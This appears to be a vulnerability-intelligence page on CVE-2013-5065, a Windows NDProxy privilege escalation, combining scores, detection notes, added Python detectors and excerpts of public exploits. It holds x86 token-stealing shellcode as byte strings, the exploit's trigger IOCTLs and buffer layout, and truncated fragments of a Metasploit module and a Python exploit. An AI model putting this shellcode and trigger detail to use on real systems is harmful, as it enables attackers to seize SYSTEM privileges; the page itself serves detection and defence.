CVE-2013-5065
Published 2013-11-28
NDProxy.sys in the kernel in Microsoft Windows XP SP2 and SP3 and Server 2003 SP2 allows local users to gain privileges via a crafted application, as exploited in the wild in November 2013.
Priority: P1 80 · high · CVSS 3.1: 7.8 (AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H)
KEV · ITW · EXPLOIT
CISA Known Exploited Vulnerability · due 2022-03-24
Exploited in the wild
EPSS: 34.89% (98.2th percentile)
Detection & IOCs (extracted from sources)
bytes:
\x90\x33\xC0\x64\x8B\x80\x24\x01\x00\x00\x8B\x40\x44\x8B\xC8\x8B\x80\x88\x00\x00\x00\x2D\x88\x00\x00\x00\x83\xB8\x84\x00\x00\x00\x04\x75\xEC\x8B\x90\xC8\x00\x00\x00\x89\x91\xC8\x00\x00\x00\xC3
bytes:
\x90\x90\x90...\x3C\x00\x00\x00\x90\x90\x90\x90\x90\x33\xC0\x64\x8B\x80\x24\x01\x00\x00\x8B\x40\x44\x8B\xC8\x8B\x80\x88\x00\x00\x00\x2D\x88\x00\x00\x00\x83\xB8\x84\x00\x00\x00\x04\x75\xEC\x8B\x90\xC8\x00\x00\x00\x89\x91\xC8\x00\x00\x00\xC3
bytes:
\x90\x90\x90...\x3C\x00\x00\x00\x90\x90\x90\x90\x90\x33\xC0\x64\x8B\x80\x24\x01\x00\x00\x8B\x40\x38\x8B\xC8\x8B\x80\x98\x00\x00\x00\x2D\x98\x00\x00\x00\x83\xB8\x94\x00\x00\x00\x04\x75\xEC\x8B\x90\xD8\x00\x00\x00\x89\x91\xD8\x00\x00\x00\xC3
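The byte-string IOCs above are the same x86 stub with a handful of structure offsets changed: it reads the current KTHREAD from the KPCR, walks EPROCESS.ActiveProcessLinks until UniqueProcessId equals 4 (System), and copies that process's Token over the caller's. The differing displacement bytes are per-OS structure offsets, so a byte-exact signature on one variant misses the other. Below is an added Python matcher (not code from this page or from any exploit it excerpts) that masks those displacements out, so one signature covers both variants, rejects windows whose displacements are not internally consistent (a NOP sled or random data fails that), and reports which layout it found. The IOC strings are copied from this page as test input; the XP SP3 versus Server 2003 SP2 labels for the two offset sets are not stated on the page and are this example's reading, matching the per-target offsets used by the public exploits for this CVE.

```python
import re
from typing import Optional

# Byte-string IOCs exactly as listed on this page, used here as sample input.
# The "..." in the second one is the page's own elision and is simply skipped.
IOC_VARIANT_A = (
    r"\x90\x33\xC0\x64\x8B\x80\x24\x01\x00\x00\x8B\x40\x44\x8B\xC8\x8B\x80\x88"
    r"\x00\x00\x00\x2D\x88\x00\x00\x00\x83\xB8\x84\x00\x00\x00\x04\x75\xEC\x8B"
    r"\x90\xC8\x00\x00\x00\x89\x91\xC8\x00\x00\x00\xC3"
)
IOC_VARIANT_B = (
    r"\x90\x90\x90...\x3C\x00\x00\x00\x90\x90\x90\x90\x90\x33\xC0\x64\x8B\x80"
    r"\x24\x01\x00\x00\x8B\x40\x38\x8B\xC8\x8B\x80\x98\x00\x00\x00\x2D\x98\x00"
    r"\x00\x00\x83\xB8\x94\x00\x00\x00\x04\x75\xEC\x8B\x90\xD8\x00\x00\x00\x89"
    r"\x91\xD8\x00\x00\x00\xC3"
)


def unescape(ioc: str) -> bytes:
    """Convert the page's \\xHH notation to raw bytes; anything else (e.g. '...') is dropped."""
    return bytes(int(h, 16) for h in re.findall(r"\\x([0-9A-Fa-f]{2})", ioc))


W = None  # wildcard: a displacement/immediate byte that varies per OS build
# x86 token-stealing stub, 47 bytes, with every structure offset masked out.
TOKEN_STEAL = [
    0x33, 0xC0,                    # xor  eax, eax
    0x64, 0x8B, 0x80, W, W, W, W,  # mov  eax, fs:[eax+disp32]   ; KPCR -> current KTHREAD
    0x8B, 0x40, W,                 # mov  eax, [eax+disp8]       ; KTHREAD -> current EPROCESS
    0x8B, 0xC8,                    # mov  ecx, eax               ; ecx = our EPROCESS
    0x8B, 0x80, W, W, W, W,        # mov  eax, [eax+disp32]      ; ActiveProcessLinks.Flink
    0x2D, W, W, W, W,              # sub  eax, imm32             ; back to the EPROCESS base
    0x83, 0xB8, W, W, W, W, 0x04,  # cmp  dword [eax+disp32], 4  ; UniqueProcessId == System?
    0x75, W,                       # jne  rel8                   ; keep walking the list
    0x8B, 0x90, W, W, W, W,        # mov  edx, [eax+disp32]      ; System's Token
    0x89, 0x91, W, W, W, W,        # mov  [ecx+disp32], edx      ; overwrite our Token
    0xC3,                          # ret
]

# (KTHREAD.Process, ActiveProcessLinks, UniqueProcessId, Token) offsets carried by the
# two IOC variants above. The OS labels are an assumption of this example, not stated
# on the page: they are the x86 XP SP3 / Server 2003 SP2 layouts public exploits use.
KNOWN_LAYOUTS = {
    (0x44, 0x88, 0x84, 0xC8): "Windows XP SP3 x86",
    (0x38, 0x98, 0x94, 0xD8): "Windows Server 2003 SP2 x86",
}


def _u32(b: bytes) -> int:
    return int.from_bytes(b, "little")


def find_token_steal(blob: bytes) -> Optional[dict]:
    """Scan blob for the masked stub; return decoded offsets and OS layout, or None."""
    n = len(TOKEN_STEAL)
    for i in range(len(blob) - n + 1):
        win = blob[i:i + n]
        if any(p is not None and p != b for p, b in zip(TOKEN_STEAL, win)):
            continue
        links, token = _u32(win[16:20]), _u32(win[36:40])
        # Consistency checks that random bytes or a NOP sled will not pass: the sub
        # must undo the list-walk displacement, both Token accesses must use the same
        # offset, and the jne must land back on the list-walk mov (pattern index 14).
        if _u32(win[21:25]) != links or _u32(win[42:46]) != token:
            continue
        rel8 = win[33] - 0x100 if win[33] & 0x80 else win[33]
        if 34 + rel8 != 14:
            continue
        key = (win[11], links, _u32(win[27:31]), token)
        return {
            "offset": i,
            "kthread_process": key[0],
            "active_process_links": key[1],
            "unique_process_id": key[2],
            "token": key[3],
            "os": KNOWN_LAYOUTS.get(key, "unknown x86 layout"),
        }
    return None


if __name__ == "__main__":
    for name, ioc in (("variant A", IOC_VARIANT_A), ("variant B", IOC_VARIANT_B)):
        print(name, find_token_steal(unescape(ioc)))
```

The same mask can be carried into a YARA rule (fixed opcodes, `??` for the displacement bytes); the Python version is here because it also decodes the offsets, which tells you which target build the payload was compiled for.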
- Monitor DeviceIoControl calls to the \\.\NDProxy device using IOCTL codes 0x8fff23cc or 0x8fff23c8 from user-mode processes; this is the trigger mechanism for this exploit.
- Detect NtAllocateVirtualMemory calls that map memory at or near address 0x00000001 (the null page / lowest memory region); mapping the null page is a prerequisite for the NULL pointer dereference exploitation technique this exploit uses.
- Alert on CreateFile handles opened against \\.\NDProxy from non-system, non-RAS processes, especially when followed by DeviceIoControl calls.
- The Turla/Waterbug threat actor exploited CVE-2013-5065 via specially crafted emails with malicious attachments and via compromised websites; correlate NDProxy exploitation with spear-phishing or watering-hole initial-access indicators.
- Absence of patch KB2914368 is a prerequisite for exploitation; use vulnerability scanning or WMIC (for example, wmic qfe) to identify unpatched Windows XP SP3 / Server 2003 SP2 x86 systems.
- The exploit only supports 32-bit (x86) targets; running it under WOW64 or on a native 64-bit system fails. Detection logic should account for architecture.
- The exploit input buffer carries a magic value at offset 20 (bytes 25 01 03 07, i.e. the dword 0x07030125 read little-endian, 0x25010307 read big-endian) followed by a size field of 0x34; these specific values in a DeviceIoControl input buffer of length 0x54 are a reliable detection artifact.
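The notes above describe one trigger sequence: a low-memory allocation, a handle to \\.\NDProxy from an unexpected process, and a DeviceIoControl with one of the two IOCTL codes carrying an 0x54-byte buffer with the magic and size fields. Here is that logic as an added Python example (not code from this page or from any product it cites) run over a constructed API trace. The IOCTL codes, buffer length, magic bytes and size value come from the notes above; the size byte is assumed to sit immediately after the magic (offset 24), as the public exploits lay it out. The record format, the process allowlist and the 64 KiB low-memory threshold are this example's own assumptions.

```python
from collections import defaultdict
from typing import Dict, Iterable, List

# Trigger artifacts as stated in the detection notes above.
NDPROXY_DEVICE = r"\\.\NDProxy"
NDPROXY_IOCTLS = {0x8FFF23C8, 0x8FFF23CC}
TRIGGER_LEN = 0x54
MAGIC_OFFSET, MAGIC = 20, b"\x25\x01\x03\x07"   # dword 0x07030125 little-endian
SIZE_OFFSET, SIZE_VALUE = 24, 0x34              # assumption: size byte follows the magic
LOW_MEMORY_LIMIT = 0x10000   # assumption: any mapping below 64 KiB counts as a null-page attempt


def build_trigger_buffer() -> bytes:
    """Rebuild the 0x54-byte DeviceIoControl input from the layout in the notes (test data)."""
    head = b"\x00" * MAGIC_OFFSET + MAGIC + bytes([SIZE_VALUE])
    return head + b"\x00" * (TRIGGER_LEN - len(head))


def is_trigger_buffer(buf: bytes) -> bool:
    """True when the buffer has the exact length, magic and size field the exploit sends."""
    return (len(buf) == TRIGGER_LEN
            and buf[MAGIC_OFFSET:MAGIC_OFFSET + len(MAGIC)] == MAGIC
            and buf[SIZE_OFFSET] == SIZE_VALUE)


def analyze(records: Iterable[dict],
            allowlist=frozenset({"svchost.exe"})) -> Dict[int, List[str]]:
    """Return {pid: [reasons]} for processes showing the CVE-2013-5065 trigger sequence.

    allowlist: image names expected to talk to NDProxy (RAS runs inside svchost.exe
    on XP/2003). It is a placeholder to tune per environment, not a vetted list.
    """
    findings: Dict[int, List[str]] = defaultdict(list)
    for r in records:
        pid, api, image = r["pid"], r["api"], r["image"].lower()
        if api == "NtAllocateVirtualMemory" and r.get("base", LOW_MEMORY_LIMIT) < LOW_MEMORY_LIMIT:
            findings[pid].append(f"{image} mapped low memory at {r['base']:#x} (null page)")
        elif api == "CreateFile" and r.get("path", "").lower() == NDPROXY_DEVICE.lower():
            if image not in allowlist:
                findings[pid].append(f"{image} opened {NDPROXY_DEVICE}")
        elif api == "DeviceIoControl" and r.get("ioctl") in NDPROXY_IOCTLS:
            buf = bytes.fromhex(r.get("inbuf_hex", ""))
            why = f"{image} sent IOCTL {r['ioctl']:#x} to {NDPROXY_DEVICE}"
            if is_trigger_buffer(buf):
                why += " with the trigger buffer (len 0x54, magic 25 01 03 07 at +20, size 0x34)"
            findings[pid].append(why)
    return dict(findings)


# Constructed API-trace records (not from any real capture): a RAS host process doing
# ordinary NDProxy I/O, and an unrelated binary running the exploit sequence.
SAMPLE_TRACE = [
    {"pid": 700, "image": "svchost.exe", "api": "CreateFile", "path": r"\\.\NDProxy"},
    {"pid": 700, "image": "svchost.exe", "api": "DeviceIoControl",
     "ioctl": 0x8FFF2380, "inbuf_hex": "00" * 16},
    {"pid": 1337, "image": "update.exe", "api": "NtAllocateVirtualMemory", "base": 0x1, "size": 0x1000},
    {"pid": 1337, "image": "update.exe", "api": "CreateFile", "path": r"\\.\NDProxy"},
    {"pid": 1337, "image": "update.exe", "api": "DeviceIoControl",
     "ioctl": 0x8FFF23C8, "inbuf_hex": build_trigger_buffer().hex()},
]


if __name__ == "__main__":
    for pid, reasons in analyze(SAMPLE_TRACE).items():
        print(pid, *reasons, sep="\n  ")
```

Scoring is deliberately per process: a single IOCTL from an allowlisted RAS host is noise, while the same IOCTL preceded by a null-page mapping from a process that has no business opening NDProxy is the page's described exploit chain and should page someone.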
CVSS provenance
- nvd v3.1: 7.8 HIGH · CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
- nvd v2.0: 7.2 HIGH · AV:L/AC:L/Au:N/C:C/I:C/A:C
- vulncheck: 7.8 HIGH
- cisa: 7.8 HIGH
GHSA
GHSA-gmpw-376j-24w5: NDProxy
ghsa_unreviewed·2022-05-14
CVE-2013-5065 [HIGH] CWE-20 GHSA-gmpw-376j-24w5: NDProxy
NDProxy.sys in the kernel in Microsoft Windows XP SP2 and SP3 and Server 2003 SP2 allows local users to gain privileges via a crafted application, as exploited in the wild in November 2013.
VulnCheck
Microsoft Windows Kernel Privilege Escalation Vulnerability
vulncheck·2013·CVSS 7.8
CVE-2013-5065 [HIGH] CWE-20 Microsoft Windows Kernel Privilege Escalation Vulnerability
Microsoft Windows Kernel Privilege Escalation Vulnerability
Microsoft Windows NDProxy.sys in the kernel contains an improper input validation vulnerability which can allow a local attacker to escalate privileges.
Affected: Microsoft Windows
Required Action: Apply updates per vendor instructions.
Exploitation References: https://www.cve.org/CVERecord?id=CVE-2013-5065; https://learn.microsoft.com/en-us/security-updates/securitybulletins/2014/ms14-002; https://securelist.com/the-epic-turla-operation/65545/; https://www.recordedfuture.com/russian-apt-toolkits; https://dl.acm.org/doi/pdf/10.1145/3465481.3465758; https://www.cisa.gov/sites/default/files/feeds/known_exploited_vulnerabilities.json; https://strapi.eurepoc.eu/uploads/Eu_Repo_C_APT_profile_Turla_c9c7d8ed38.pdf
Remediation Due: 2
CISA
Microsoft Windows Kernel Privilege Escalation Vulnerability
cisa·2022-03-03·CVSS 7.8
CVE-2013-5065 [HIGH] CWE-20 Microsoft Windows Kernel Privilege Escalation Vulnerability
Vulnerability: Microsoft Windows Kernel Privilege Escalation Vulnerability
Affected: Microsoft Windows
Microsoft Windows NDProxy.sys in the kernel contains an improper input validation vulnerability which can allow a local attacker to escalate privileges.
Required Action: Apply updates per vendor instructions.
Notes: https://nvd.nist.gov/vuln/detail/CVE-2013-5065
Remediation Due Date: 2022-03-24
No detection rules found.
Exploit-DB
Microsoft Windows XP SP3 (x86) / 2003 SP2 (x86) - 'NDProxy' Local Privilege Escalation (MS14-002)
exploitdb·2015-08-07
CVE-2013-5065 Microsoft Windows XP SP3 (x86) / 2003 SP2 (x86) - 'NDProxy' Local Privilege Escalation (MS14-002)
Microsoft Windows XP SP3 (x86) / 2003 SP2 (x86) - 'NDProxy' Local Privilege Escalation (MS14-002)
---
/*
################################################################
# Exploit Title: Windows NDProxy Privilege Escalation (MS14-002)
# Date: 2015-08-03
# Exploit Author: Tomislav Paskalev
# Vulnerable Software:
# Windows XP SP3 x86
# Windows XP SP2 x86-64
# Windows 2003 SP2 x86
# Windows 2003 SP2 x86-64
# Windows 2003 SP2 IA-64
# Supported vulnerable software:
# Windows XP SP3 x86
# Windows 2003 SP2 x86
# Tested on:
# Windows XP SP3 x86 EN
# Windows 2003 SP2 x86 EN
# CVE ID: 2013-5065
################################################################
# Vulnerability description:
# NDPROXY is a system-provided driver that interfaces WAN
# miniport drivers, call managers, and miniport call m
Exploit-DB
Microsoft Windows - 'ndproxy.sys' Local Privilege Escalation (Metasploit)
exploitdb·2013-12-17
CVE-2013-5065 Microsoft Windows - 'ndproxy.sys' Local Privilege Escalation (Metasploit)
Microsoft Windows - 'ndproxy.sys' Local Privilege Escalation (Metasploit)
---
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
require 'rex'
class Metasploit3 < Msf::Exploit::Local
  # (the lines between the class declaration and the module info hash are missing from this excerpt)
      'Name'        => 'Microsoft Windows ndproxy.sys Local Privilege Escalation',
      'Description' => %q{
        This module exploits a flaw in the ndproxy.sys driver on Windows XP SP3 and Windows 2003
        SP2 systems, exploited in the wild in November, 2013. The vulnerability exists while
        processing an IO Control Code 0x8fff23c8 or 0x8fff23cc, where user provided input is used
        to access an array unsafely, and the value is used to perform a call, leading to a NULL
        pointer dereference which is exploitable on both Windows XP and Windows 2003 systems. This
        module
Exploit-DB
Microsoft Windows - 'NDPROXY' SYSTEM Privilege Escalation (MS14-002)
exploitdb·2013-12-03·CVSS 7.8
CVE-2013-5065 [HIGH] Microsoft Windows - 'NDPROXY' SYSTEM Privilege Escalation (MS14-002)
Microsoft Windows - 'NDPROXY' SYSTEM Privilege Escalation (MS14-002)
---
# NDPROXY Local SYSTEM privilege escalation
# http://www.offensive-security.com
# Tested on Windows XP SP3
# http://www.offensive-security.com/vulndev/ndproxy-local-system-exploit-cve-2013-5065/
# Original crash ... null pointer dereference
# Access violation - code c0000005 (!!! second chance !!!)
# 00000038 ?? ???
from ctypes import *
from ctypes.wintypes import *
import os, sys
kernel32 = windll.kernel32
ntdll = windll.ntdll
GENERIC_READ = 0x80000000
GENERIC_WRITE = 0x40000000
FILE_SHARE_READ = 0x00000001
FILE_SHARE_WRITE = 0x00000002
NULL = 0x0
OPEN_EXISTING = 0x3
PROCESS_VM_WRITE = 0x0020
PROCESS_VM_READ = 0x0010
MEM_COMMIT = 0x00001000
MEM_RESERVE = 0x00002000
MEM_FREE = 0x00010000
PAGE_EXECUTE_READWRITE = 0x00000040
Trendmicro
Examining the Activities of the Turla APT Group
blogs_trendmicro·2023-09-22·CVSS 9.8
[CRITICAL] Examining the Activities of the Turla APT Group
APT & Targeted Attacks
# Examining the Activities of the Turla APT Group
We examine the campaigns of the cyberespionage group known as Turla over the years, with a special focus on the key MITRE techniques and the corresponding IDs associated with the threat actor group.
By: Srivathsa Sharma
2023/09/22
An introduction to Turla
Regarded as a highly sophisticated advanced persistent threat (APT) group, the Russian-based Turla has been suspected to be operational since at least 2004.
Turla’s group names are infamously titled after its
Talos
Microsoft Update Tuesday: January 2014, fix for the XP/2003 0-day vulnerability
blogs_talos·2014-01-14·CVSS 9.8
CVE-2014-0258 [CRITICAL] Microsoft Update Tuesday: January 2014, fix for the XP/2003 0-day vulnerability
The first Microsoft Update Tuesday of 2014 is here and it’s a very light month this time around. We’ve got 4 bulletins covering 6 CVEs. What’s remarkable is that there’s no Internet Explorer bulletin this month. There are also no bulletins that are marked critical, all 4 bulletins are marked as important.
The first bulletin, MS14-001, is for Word and Office Web Apps, this bulletin covers 3 CVEs (CVE-2014-0258, CVE-2014-0259 and CVE-2014-0260. They are memory corruption vulnerabilities in Word, which could result in remote code execution.
MS14-002 is a fix for the Windows XP/2003 0-day kernel escalation of privilege vulnerability (CVE-2013-5065) that was being exploited in the wild in tandem with the Adobe Reader vulnerability (CVE-2013-3346). Here an attacker would convince the user to o
Talos
Microsoft Update Tuesday: December 2013, some 0-day fixes
blogs_talos·2013-12-10·CVSS 5.5
CVE-2013-5045 [MEDIUM] Microsoft Update Tuesday: December 2013, some 0-day fixes
## Microsoft Update Tuesday: December 2013, some 0-day fixes
Microsoft’s final update for the year brings us 11 bulletins covering 24 CVE issues.
As is customary, there is the critical IE bulletin, MS13-097. This time it covers 7 CVE issues. As in other months, this includes a number of use-after-free issues that we’ve come to expect in IE. However this month we also get 2 escalation of privilege vulnerabilities (CVE-2013-5045 and CVE-2013-5046), where an attacker could break out of the low integrity sandbox. This assumes of course that the attacker has first gained remote code execution through another vulnerability and then uses one of these vulnerabilities to execute arbitrary programs.
There is also a critical update for GDI+, MS13-096. This one fixes the 0-day vulnerability (CVE-2013-3906) that is being exploited in the wild. The vulnerabilit
Zscaler
Zscaler found Multiple Security Vulnerabilities | 12-10-2013
blogs_zscaler·CVSS 9.3
[CRITICAL] Zscaler found Multiple Security Vulnerabilities | 12-10-2013
Zscaler
Zscaler Protects against Vulnerability in Windows Kernel which allows Elevation of Privileges | Zscaler
blogs_zscaler·CVSS 7.8
[HIGH] Zscaler Protects against Vulnerability in Windows Kernel which allows Elevation of Privileges | Zscaler
References
- http://technet.microsoft.com/security/advisory/2914486
- http://www.fireeye.com/blog/technical/cyber-exploits/2013/11/ms-windows-local-privilege-escalation-zero-day-in-the-wild.html
- https://docs.microsoft.com/en-us/security-updates/securitybulletins/2014/ms14-002
- https://www.exploit-db.com/exploits/37732/
- https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2013-5065
Timeline
- 2013-11-28: Published
- 2022-03-03: Added to CISA KEV
- Exploited in the wild